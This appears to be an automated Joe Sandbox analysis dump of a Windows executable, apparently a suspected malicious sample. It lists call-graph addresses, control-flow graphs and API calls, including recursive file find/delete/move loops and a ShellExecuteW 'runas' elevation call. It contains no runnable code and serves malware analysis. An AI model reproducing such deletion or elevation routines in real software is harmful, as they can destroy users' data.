103625->103626 103635 e7eaf4 103625->103635 103627 e8005b 22 API calls 103626->103627 103628 e7eac3 103627->103628 103629 e6addd 22 API calls 103628->103629 103630 e7eacd 103629->103630 103638 e7eb07 103630->103638 103633 e6b139 22 API calls 103634 e7eade CharUpperBuffW 103633->103634 103634->103635 103635->103619 103636->103614 103637->103619 103639 e7eb15 103638->103639 103640 e7ead7 103638->103640 103641 e6ad43 22 API calls 103639->103641 103640->103633 103641->103640 101747 e8067b 101748 e80687 101747->101748 101776 e80131 101748->101776 101750 e8068e 101751 e807e1 101750->101751 101754 e806b8 101750->101754 101806 e80abf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 101751->101806 101753 e807e8 101799 e850d2 101753->101799 101765 e806f7 101754->101765 101787 e926fd 101754->101787 101761 e806d7 101763 e80758 101795 e80bd9 101763->101795 101765->101763 101802 e8509a 38 API calls 101765->101802 101767 e8075e 101768 e80773 101767->101768 101803 e80c12 GetModuleHandleW 101768->101803 101770 e8077a 101770->101753 101771 e8077e 101770->101771 101772 e80787 101771->101772 101804 e85075 28 API calls 101771->101804 101805 e802c0 13 API calls 101772->101805 101775 e8078f 101775->101761 101777 e8013a 101776->101777 101808 e80918 IsProcessorFeaturePresent 101777->101808 101779 e80146 101809 e82f14 10 API calls 101779->101809 101781 e8014b 101782 e8014f 101781->101782 101810 e92597 101781->101810 101782->101750 101785 e80166 101785->101750 101790 e92714 101787->101790 101788 e80d0c 5 API calls 101789 e806d1 101788->101789 101789->101761 101791 e926a1 101789->101791 101790->101788 101794 e926d0 101791->101794 101792 e80d0c 5 API calls 101793 e926f9 101792->101793 101793->101765 101794->101792 101890 e825c0 101795->101890 101798 e80bff 101798->101767 101892 e84e4f 101799->101892 101802->101763 101803->101770 101804->101772 101805->101775 101806->101753 101808->101779 101809->101781 101814 e9d477 101810->101814 101813 e82f3d 8 API calls 101813->101782 101817 e9d494 101814->101817 101818 e9d490 101814->101818 101816 e80158 101816->101785 101816->101813 101817->101818 101821 e94e7b 101817->101821 101833 e94dc5 101817->101833 101838 e80d0c 101818->101838 101822 e94e87 101821->101822 101845 e931de EnterCriticalSection 101822->101845 101824 e94e8e 101846 e9532f 101824->101846 101826 e94e9d 101827 e94eac 101826->101827 101859 e94d0f 29 API calls 101826->101859 101860 e94ec8 LeaveCriticalSection 101827->101860 101830 e94ea7 101832 e94dc5 2 API calls 101830->101832 101831 e94ebd 101831->101817 101832->101827 101837 e94dcc 101833->101837 101834 e94e0f GetStdHandle 101834->101837 101835 e94e77 101835->101817 101836 e94e22 GetFileType 101836->101837 101837->101834 101837->101835 101837->101836 101839 e80d15 101838->101839 101840 e80d17 IsProcessorFeaturePresent 101838->101840 101839->101816 101842 e80edd 101840->101842 101889 e80ea1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 101842->101889 101844 e80fc0 101844->101816 101845->101824 101847 e9533b 101846->101847 101848 e95348 101847->101848 101849 e9535f 101847->101849 101869 e8f559 20 API calls 101848->101869 101861 e931de EnterCriticalSection 101849->101861 101852 e9534d 101870 e92a6c 26 API calls 101852->101870 101855 e9536b 101858 e95397 101855->101858 101862 e95280 101855->101862 101856 e95357 101856->101826 101871 e953be LeaveCriticalSection 101858->101871 101859->101830 101860->101831 101861->101855 101872 e94efd 101862->101872 101864 e9529f 101880 e92c48 101864->101880 101865 e95292 101865->101864 101879 e93685 11 API calls 101865->101879 101868 e952f1 101868->101855 101869->101852 101870->101856 101871->101856 101878 e94f0a 101872->101878 101873 e94f4a 101887 e8f559 20 API calls 101873->101887 101874 e94f35 RtlAllocateHeap 101876 e94f48 101874->101876 101874->101878 101876->101865 101878->101873 101878->101874 101886 e8512d 7 API calls 101878->101886 101879->101865 101881 e92c7c 101880->101881 101882 e92c53 RtlFreeHeap 101880->101882 101881->101868 101882->101881 101883 e92c68 101882->101883 101888 e8f559 20 API calls 101883->101888 101885 e92c6e GetLastError 101885->101881 101886->101878 101887->101876 101888->101885 101889->101844 101891 e80bec GetStartupInfoW 101890->101891 101891->101798 101893 e84e5b 101892->101893 101894 e84e62 101893->101894 101895 e84e74 101893->101895 101931 e84fa9 GetModuleHandleW 101894->101931 101916 e931de EnterCriticalSection 101895->101916 101898 e84e67 101898->101895 101932 e84fed GetModuleHandleExW 101898->101932 101899 e84f19 101920 e84f59 101899->101920 101903 e84e7b 101903->101899 101905 e84ef0 101903->101905 101917 e92428 101903->101917 101906 e84f08 101905->101906 101910 e926a1 5 API calls 101905->101910 101911 e926a1 5 API calls 101906->101911 101907 e84f62 101940 ea1fa9 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 101907->101940 101908 e84f36 101923 e84f68 101908->101923 101910->101906 101911->101899 101916->101903 101941 e92161 101917->101941 101960 e93226 LeaveCriticalSection 101920->101960 101922 e84f32 101922->101907 101922->101908 101961 e9388c 101923->101961 101926 e84f96 101929 e84fed 8 API calls 101926->101929 101927 e84f76 GetPEB 101927->101926 101928 e84f86 GetCurrentProcess TerminateProcess 101927->101928 101928->101926 101930 e84f9e ExitProcess 101929->101930 101931->101898 101933 e8503a 101932->101933 101934 e85017 GetProcAddress 101932->101934 101935 e85049 101933->101935 101936 e85040 FreeLibrary 101933->101936 101938 e8502c 101934->101938 101937 e80d0c 5 API calls 101935->101937 101936->101935 101939 e84e73 101937->101939 101938->101933 101939->101895 101944 e92110 101941->101944 101943 e92185 101943->101905 101945 e9211c 101944->101945 101952 e931de EnterCriticalSection 101945->101952 101947 e9212a 101953 e921b1 101947->101953 101951 e92148 101951->101943 101952->101947 101954 e921d1 101953->101954 101957 e921d9 101953->101957 101955 e80d0c 5 API calls 101954->101955 101956 e92137 101955->101956 101959 e92155 LeaveCriticalSection 101956->101959 101957->101954 101958 e92c48 20 API calls 101957->101958 101958->101954 101959->101951 101960->101922 101962 e938b1 101961->101962 101963 e938a7 101961->101963 101968 e93257 GetProcAddress LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 101962->101968 101965 e80d0c 5 API calls 101963->101965 101966 e84f72 101965->101966 101966->101926 101966->101927 101967 e938c8 101967->101963 101968->101967 103642 e6e455 103643 e6b920 229 API calls 103642->103643 103644 e6e463 103643->103644 101969 e61033 101974 e65524 101969->101974 101973 e61042 101975 e6addd 22 API calls 101974->101975 101976 e65592 101975->101976 101982 e6467d 101976->101982 101978 e6562f 101979 e61038 101978->101979 101985 e65784 22 API calls 101978->101985 101981 e80323 29 API calls 101979->101981 101981->101973 101986 e646a9 101982->101986 101985->101978 101987 e646b6 101986->101987 101988 e6469c 101986->101988 101987->101988 101989 e646bd RegOpenKeyExW 101987->101989 101988->101978 101989->101988 101990 e646d7 RegQueryValueExW 101989->101990 101991 e6470d RegCloseKey 101990->101991 101992 e646f8 101990->101992 101991->101988 101992->101991 101993 e8ef7e 101994 e8ef8a 101993->101994 101995 e8efab 101994->101995 101996 e8ef96 101994->101996 102006 e8940d EnterCriticalSection 101995->102006 102012 e8f559 20 API calls 101996->102012 101999 e8ef9b 102013 e92a6c 26 API calls 101999->102013 102000 e8efb7 102007 e8efeb 102000->102007 102004 e8efa6 102006->102000 102015 e8f016 102007->102015 102009 e8eff8 102010 e8efc4 102009->102010 102035 e8f559 20 API calls 102009->102035 102014 e8efe1 LeaveCriticalSection 102010->102014 102012->101999 102013->102004 102014->102004 102016 e8f03e 102015->102016 102017 e8f024 102015->102017 102036 e8dbd5 102016->102036 102046 e8f559 20 API calls 102017->102046 102020 e8f029 102047 e92a6c 26 API calls 102020->102047 102021 e8f047 102043 e99689 102021->102043 102025 e8f14b 102027 e8f158 102025->102027 102031 e8f0fe 102025->102031 102026 e8f0cf 102029 e8f0ec 102026->102029 102026->102031 102049 e8f559 20 API calls 102027->102049 102048 e8f32f 31 API calls 102029->102048 102032 e8f034 102031->102032 102050 e8f1ab 30 API calls 102031->102050 102032->102009 102033 e8f0f6 102033->102032 102035->102010 102037 e8dbe1 102036->102037 102038 e8dbf6 102036->102038 102051 e8f559 20 API calls 102037->102051 102038->102021 102040 e8dbe6 102052 e92a6c 26 API calls 102040->102052 102042 e8dbf1 102042->102021 102053 e99506 102043->102053 102045 e8f063 102045->102025 102045->102026 102045->102032 102046->102020 102047->102032 102048->102033 102049->102032 102050->102032 102051->102040 102052->102042 102054 e99512 102053->102054 102055 e9951a 102054->102055 102056 e99532 102054->102056 102088 e8f546 20 API calls 102055->102088 102058 e995e6 102056->102058 102062 e9956a 102056->102062 102093 e8f546 20 API calls 102058->102093 102059 e9951f 102089 e8f559 20 API calls 102059->102089 102078 e953c7 EnterCriticalSection 102062->102078 102063 e995eb 102094 e8f559 20 API calls 102063->102094 102066 e99570 102068 e995a9 102066->102068 102069 e99594 102066->102069 102067 e995f3 102095 e92a6c 26 API calls 102067->102095 102079 e9960b 102068->102079 102090 e8f559 20 API calls 102069->102090 102071 e99527 102071->102045 102074 e995a4 102092 e995de LeaveCriticalSection 102074->102092 102075 e99599 102091 e8f546 20 API calls 102075->102091 102078->102066 102096 e95644 102079->102096 102081 e9961d 102082 e99625 102081->102082 102083 e99636 SetFilePointerEx 102081->102083 102109 e8f559 20 API calls 102082->102109 102085 e9962a 102083->102085 102086 e9964e GetLastError 102083->102086 102085->102074 102110 e8f523 20 API calls 102086->102110 102088->102059 102089->102071 102090->102075 102091->102074 102092->102071 102093->102063 102094->102067 102095->102071 102097 e95651 102096->102097 102098 e95666 102096->102098 102111 e8f546 20 API calls 102097->102111 102102 e9568b 102098->102102 102113 e8f546 20 API calls 102098->102113 102101 e95656 102112 e8f559 20 API calls 102101->102112 102102->102081 102103 e95696 102114 e8f559 20 API calls 102103->102114 102106 e9565e 102106->102081 102107 e9569e 102115 e92a6c 26 API calls 102107->102115 102109->102085 102110->102085 102111->102101 102112->102106 102113->102103 102114->102107 102115->102106 102116 e6e330 102119 e79eb3 102116->102119 102118 e6e33c 102120 e79ed4 102119->102120 102125 e79f31 102119->102125 102122 e6f1b0 229 API calls 102120->102122 102120->102125 102126 e79f05 102122->102126 102123 eb7f34 102123->102123 102124 e79f75 102124->102118 102125->102124 102128 ed3dec 82 API calls 102125->102128 102126->102124 102126->102125 102127 e6ad43 22 API calls 102126->102127 102127->102125 102128->102123 103645 ea2c9d 103646 e6238f 103645->103646 103647 ea2ca7 103645->103647 103673 e623ed 7 API calls 103646->103673 103677 e645cc 103647->103677 103650 ea2cb0 103652 e6a1b9 22 API calls 103650->103652 103655 ea2cbe 103652->103655 103654 e62399 103658 e62874 61 API calls 103654->103658 103659 e623ae 103654->103659 103656 ea2ced 103655->103656 103657 ea2cc6 103655->103657 103661 e65954 22 API calls 103656->103661 103660 e65954 22 API calls 103657->103660 103658->103659 103664 e623c9 103659->103664 103667 e62810 Shell_NotifyIconW 103659->103667 103662 ea2cd1 103660->103662 103663 ea2ce9 GetForegroundWindow ShellExecuteW 103661->103663 103665 e66a2c 22 API calls 103662->103665 103669 ea2d1e 103663->103669 103671 e623d0 SetCurrentDirectoryW 103664->103671 103668 ea2cdf 103665->103668 103667->103664 103670 e65954 22 API calls 103668->103670 103669->103664 103670->103663 103672 e623e4 103671->103672 103684 e6253e 7 API calls 103673->103684 103675 e62394 103676 e624cd CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103675->103676 103676->103654 103678 ea21d0 103677->103678 103679 e645d9 GetModuleFileNameW 103678->103679 103680 e6a1b9 22 API calls 103679->103680 103681 e645ff 103680->103681 103682 e6462f 23 API calls 103681->103682 103683 e64609 103682->103683 103683->103650 103684->103675 103685 e6105b 103690 e642df 103685->103690 103687 e6106a 103721 e80323 29 API calls 103687->103721 103689 e61074 103691 e642ef 103690->103691 103692 e6addd 22 API calls 103691->103692 103693 e643a5 103692->103693 103694 e645cc 24 API calls 103693->103694 103695 e643ae 103694->103695 103722 e64270 103695->103722 103698 e65954 22 API calls 103699 e643c7 103698->103699 103700 e656ec 22 API calls 103699->103700 103701 e643d6 103700->103701 103702 e6addd 22 API calls 103701->103702 103703 e643df 103702->103703 103704 e6abe7 22 API calls 103703->103704 103705 e643e8 RegOpenKeyExW 103704->103705 103706 ea3c46 RegQueryValueExW 103705->103706 103707 e6440a 103705->103707 103708 ea3cdc RegCloseKey 103706->103708 103709 ea3c63 103706->103709 103707->103687 103708->103707 103720 ea3cee 103708->103720 103710 e8008b 22 API calls 103709->103710 103711 ea3c7c 103710->103711 103712 e63257 22 API calls 103711->103712 103713 ea3c87 RegQueryValueExW 103712->103713 103714 ea3ca4 103713->103714 103717 ea3cbe 103713->103717 103715 e673e7 22 API calls 103714->103715 103715->103717 103716 e65200 22 API calls 103716->103720 103717->103708 103718 e6a1b9 22 API calls 103718->103720 103719 e656ec 22 API calls 103719->103720 103720->103707 103720->103716 103720->103718 103720->103719 103721->103689 103723 ea21d0 103722->103723 103724 e6427d GetFullPathNameW 103723->103724 103725 e6429f 103724->103725 103726 e673e7 22 API calls 103725->103726 103727 e642bd 103726->103727 103727->103698 103728 e61098 103733 e64e28 103728->103733 103732 e610a7 103734 e6addd 22 API calls 103733->103734 103735 e64e3f GetVersionExW 103734->103735 103736 e673e7 22 API calls 103735->103736 103737 e64e8c 103736->103737 103738 e68645 22 API calls 103737->103738 103750 e64ec2 103737->103750 103739 e64eb6 103738->103739 103741 e66925 22 API calls 103739->103741 103740 e64f7c GetCurrentProcess IsWow64Process 103742 e64f98 103740->103742 103741->103750 103743 ea417b GetSystemInfo 103742->103743 103744 e64fb0 LoadLibraryA 103742->103744 103745 e64fc1 GetProcAddress 103744->103745 103746 e64ffd GetSystemInfo 103744->103746 103745->103746 103748 e64fd1 GetNativeSystemInfo 103745->103748 103749 e64fd7 103746->103749 103747 ea4136 103748->103749 103751 e6109d 103749->103751 103752 e64fdb FreeLibrary 103749->103752 103750->103740 103750->103747 103753 e80323 29 API calls 103751->103753 103752->103751 103753->103732

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1228 ecd72c-ecd78a call e6addd * 3 call e6462f * 2 call ece84e call ece8bb 1243 ecd78c-ecd790 call e65954 1228->1243 1244 ecd795-ecd79f call ece8bb 1228->1244 1243->1244 1248 ecd7aa-ecd7e8 call e6addd * 2 call e657ec FindFirstFileW 1244->1248 1249 ecd7a1-ecd7a5 call e65954 1244->1249 1257 ecd7ee 1248->1257 1258 ecd919-ecd920 FindClose 1248->1258 1249->1248 1260 ecd7f4-ecd7f6 1257->1260 1259 ecd923-ecd951 call e67e4c * 5 1258->1259 1260->1258 1262 ecd7fc-ecd803 1260->1262 1264 ecd809-ecd86f call e6a1b9 call ecde7b call e67e4c call e66a2c call e65954 call ecdb84 1262->1264 1265 ecd8e5-ecd8f8 FindNextFileW 1262->1265 1287 ecd895-ecd899 1264->1287 1288 ecd871-ecd874 1264->1288 1265->1260 1268 ecd8fe-ecd903 1265->1268 1268->1260 1291 ecd89b-ecd89e 1287->1291 1292 ecd8c7-ecd8cd call ecd952 1287->1292 1289 ecd908-ecd912 FindClose call e67e4c 1288->1289 1290 ecd87a-ecd891 call e7de05 1288->1290 1301 ecd917 1289->1301 1302 ecd8a3-ecd8ac MoveFileW 1290->1302 1305 ecd893 DeleteFileW 1290->1305 1296 ecd8ae-ecd8be call ecd952 1291->1296 1297 ecd8a0 1291->1297 1299 ecd8d2 1292->1299 1296->1289 1306 ecd8c0-ecd8c5 DeleteFileW 1296->1306 1297->1302 1304 ecd8d5-ecd8d7 1299->1304 1301->1259 1302->1304 1304->1289 1307 ecd8d9-ecd8e1 call e67e4c 1304->1307 1305->1287 1306->1304 1307->1265
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E6462F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E64609,?,?,00EA3BD6,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E6464F
                                                                                                                                                                                                                                        • Part of subcall function 00ECE8BB: GetFileAttributesW.KERNEL32(?,00ECD64B), ref: 00ECE8BC
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ECD7D8
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00ECD893
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00ECD8A6
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00ECD8C3
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00ECD8ED
                                                                                                                                                                                                                                        • Part of subcall function 00ECD952: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00ECD8D2,?,?), ref: 00ECD968
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00ECD909
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ECD91A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                      • Opcode ID: dbdaa94eb97e932467f191699cf7283133f3cbd20eb22922993ab686bf365ee9
                                                                                                                                                                                                                                      • Instruction ID: f00516f6e50f4845c3fd5ab0317585ec946c9fa98f521ca2681803261c80993c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbdaa94eb97e932467f191699cf7283133f3cbd20eb22922993ab686bf365ee9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F618F3190510DAECF05EBA0EE92EEDB7B5AF54304F2450A9E446771A1EB325F0ECB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1378 ecda5f-ecdaa6 call e6addd * 3 call e6462f call ece8bb 1389 ecdaa8-ecdab1 call e65954 1378->1389 1390 ecdab6-ecdae7 call e657ec FindFirstFileW 1378->1390 1389->1390 1394 ecdae9-ecdaeb 1390->1394 1395 ecdb56-ecdb5d FindClose 1390->1395 1394->1395 1397 ecdaed-ecdaf2 1394->1397 1396 ecdb61-ecdb83 call e67e4c * 3 1395->1396 1399 ecdaf4-ecdb2f call e6ad43 call e66a2c call e65954 DeleteFileW 1397->1399 1400 ecdb31-ecdb43 FindNextFileW 1397->1400 1399->1400 1413 ecdb4d-ecdb54 FindClose 1399->1413 1400->1394 1401 ecdb45-ecdb4b 1400->1401 1401->1394 1413->1396
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E6462F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E64609,?,?,00EA3BD6,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E6464F
                                                                                                                                                                                                                                        • Part of subcall function 00ECE8BB: GetFileAttributesW.KERNEL32(?,00ECD64B), ref: 00ECE8BC
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ECDAD6
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00ECDB26
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00ECDB37
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ECDB4E
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ECDB57
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                      • Opcode ID: fdc5b586475e5f8dee0f90e03b566708aa5c2d6e065a91190b04630a61293a7a
                                                                                                                                                                                                                                      • Instruction ID: f90408f9f24852e3fdc25ccccc5861f24728b35b6735e1e1387483e731a0bf68
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fdc5b586475e5f8dee0f90e03b566708aa5c2d6e065a91190b04630a61293a7a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7316F3104C3859BC605EB60ED419AFB7E8AE95348F446A2DF4D5A31A1EB22DA0DCB53
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E623D5
                                                                                                                                                                                                                                        • Part of subcall function 00E645CC: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00EA3BD6,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E645EA
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00F23204), ref: 00EA2D08
                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,00F23204), ref: 00EA2D0F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow
                                                                                                                                                                                                                                      • String ID: runas
                                                                                                                                                                                                                                      • API String ID: 3686610399-4000483414
                                                                                                                                                                                                                                      • Opcode ID: c99fa89e8e1b42645a90caede10926ce90cfc18f8c7e02493be93a2463e81cd0
                                                                                                                                                                                                                                      • Instruction ID: 2f26dcf18d8ddc1c23dbc839c7e8dee5fb4642cec80e637e76d07929d230c57e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c99fa89e8e1b42645a90caede10926ce90cfc18f8c7e02493be93a2463e81cd0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9711B4712882429AC704FB60FC5197EBBE49BD0798F00742DB292760A3CF24895DE712
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00EA370C), ref: 00ECE28D
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00ECE29C
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ECE2AD
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ECE2B9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2695905019-0
                                                                                                                                                                                                                                      • Opcode ID: 33640ee7578023dfcc9e64c264857a4481f76e3889e679d114b683a1ed1142aa
                                                                                                                                                                                                                                      • Instruction ID: 09f76f7ffbaf491ee9f31ef8db8f0dace44c994bdd048bf4e0b5a657ff17f4e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33640ee7578023dfcc9e64c264857a4481f76e3889e679d114b683a1ed1142aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7F0A0304189145BA2186738ED0EABA7B6D9F81338B104709F835E22F0E775A95A86D5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,?,00E84F3E,00000003,00F298C8,0000000C,00E85095,00000003,00000002,00000000,?,00E92B69,00000003), ref: 00E84F89
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00E84F3E,00000003,00F298C8,0000000C,00E85095,00000003,00000002,00000000,?,00E92B69,00000003), ref: 00E84F90
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00E84FA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: 7bcce6ed9dc10cd3a7180748a147970e8cae6961c2e462daa192dc8a32e2d05a
                                                                                                                                                                                                                                      • Instruction ID: 8772c2b1d6e16aaef73620a9527388cafa34050d48fb88fe946a9b5b2fea6eaa
